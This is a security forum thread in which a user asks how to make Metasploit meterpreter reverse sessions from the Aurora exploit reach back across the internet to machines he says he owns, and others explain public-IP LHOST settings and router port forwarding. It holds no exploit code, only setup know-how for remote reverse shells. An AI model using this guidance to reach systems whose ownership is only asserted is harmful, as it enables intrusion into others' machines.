Results 1 to 6 of 6

Thread: exploiting beyond the LAN

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default exploiting beyond the LAN

    Hi Fellaz,

    I've successfully exploited various win xp machines on my lan in lab environment using SET and aurora exploit but that is locally, how can these exploitz be used against other side of router on MY remote office pcs (ie.) want to try and pentest outside the local lan, will the exploit meterpreter session come back to me on my LHOST 192.168.0.8 address even if not on the same lan. if not how can it be acheived?

    Pentest office : attack machine ip 192.168.0.8 public ip 96.xxx.xxx.xxx
    Remote office different lan: victim ip 192.168.1.9 public ip 92.xxx.xxx.xxx
    MY OWN btw victim machine both owned my myself.

    both ip addresses differ 92.xxx.xxx.xxx and 96.xxx.xxx.xxx so how to metasploit past my remote router into the lan side.

    As stated I own both networks but not Pwnd yet.
    Googled and not found a thing apart from changing LHOST to public ip but thats just the router isnt it?

    Kind Regardz DEE


    Hi

    Thanks for you response to my problem, i am still having problems with the port forward feature.... After your advice i am have set up my attack side lan router to forward incoming connections on port 4444 TCP/UDP to any on lan.

    Now when i do a aurora attack on my office for connection back on my backtrack 4 machine ip= 192.168.0.8 i have set LHOST to my routers ip address = 90.xxx.xxx.114 i get my router login pop up after the ip add is input in browser. my router settings are:

    Firmware Version 1.9Sky
    ADSL Port
    MAC Address 00:xx:69:xx:34:xx
    IP Address 90.xxx.xxx.114 (is the one i used in LHOST)
    Network Type PPPoA
    IP Subnet Mask 255.255.255.255
    Gateway IP Address=89.xxx.128.xxx
    Domain Name Server =90.xxx.xxx.97 90.xxx.xxx.99
    LAN Port
    MAC Address 00:xx:xx:xx:xx:d6
    IP Address 192.168.0.1
    DHCP enable
    IP Subnet Mask 255.255.255.0

    Please advise as to which ip to use in my LHOST so that the packets are fowarded form there on to my local ip 192.168.0.8

    Do i use the gateway ip instead?

    thanks again this is the final part for me to pentest my office remotely.

    BTW ESET SMART SECURITY IS THE MUTZ NUTZ ... defeats arp poisoning and much more.
    Last edited by pentest09; 02-06-2010 at 07:07 PM.

  2. #2
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: exploiting beyond the LAN

    I've already responded to this thread in the old forums, but for those who might interest the answer, i'll post it here too. I changed some things to make the post clearer as it made some confusion in OP's head and now I understand why.
    -----------------------
    Quote Originally Posted by pentest09 View Post
    want to try and pentest outside the local lan, will the exploit meterpreter session come back to me on my LHOST 192.168.0.8 address even if not on the same lan.
    Obviously not. If you did that, meterpreter would try to communicate with 192.168.0.8 but on your remote office's local network. You would have to set your LHOST to your pentest office IP on the net and port-forward the meterpreter's port to your local IP (this is made on your pentest office's router's configuration pages).

    Quote Originally Posted by pentest09 View Post
    As stated I own both networks but not Pwnd yet.
    Googled and not found a thing apart from changing LHOST to public ip but thats just the router isnt it?
    Yes, that's just the router unless you port-forward like I said above, so that the router know what to do with the incoming connection.
    Last edited by Snayler; 02-05-2010 at 01:10 AM. Reason: Making it clearer...

  3. #3
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default Re: exploiting beyond the LAN

    I was going to respond over there, but I think I'll do it here.

    If you own both of those networks you are either in charge of them (i.e. CEO), or you are a network guy. If you are the CEO you need to look into how things work on the internet - specifically NAT, routing, private/public IP addressing, and the TCProtocol. If you are the network guy in charge, you need to turn in your geek card for not knowing the basics.

    Either way you have a course to try
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: exploiting beyond the LAN

    You had better also make sure that both of your ISPs (your home account ISP and your business account ISP) allow attack traffic to be sent over their connections.

    And if you don't already know how things like NAT work sending attack traffic over the Internet may be a dangerous proposition. What if you end up attacking the wrong person by mistake?
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: exploiting beyond the LAN

    Hi again Fellaz,

    Thanks for your responses now I have tried to forward the meterpreter LHOST to my public ip on my attack machines net but when i try the aurora exploit it brings up my router login page i have 3 ips in my router set up

    ADSL PORT SETTINGS

    1: Ip address= 90.219.xxx.xxx (which i used as LHOST and port 4444 in metasploit)


    2: Gateway IP Address = 89.xxxx.128.xxxx

    3: Domain Name Server 90.xxx.xxx.97 90.xxx.xxx.99

    and lan IP = 192.168.0.8 Backtrack machine with listener

    Now which ip is the one for the exploit to connect to and foward on to my lan ip?

    Everthing works fine in LAN, SET , MSF and so on Please help as I cant get it working and googled but not much in way of this and remote exploit.org .down on all my machines so think its being updated cant connect .

    regards DEE

    Ps: Much appreciated the replies.

  6. #6
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Cool Re: exploiting beyond the LAN

    Ok ladz think i get the jist,

    Usually LHOST is the path back locally from the victim which is local ip internally so i just set it to path back to attack net router the DMZ option it to forward the connect on to local ip machine Attacker and set up the firewall rule on routers to accept the incoming coonection on port say: 5555 to just wan ip locallly ie 192.168.0.6.

    But.............I check the port via port checker to see if open and only one that shows open is utoorents port all other seem closed.

    Getting there slowly trying again today thanks for all your replies, and pureh@te your a tough cookie fella but but thanks all the same.

    DEE

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •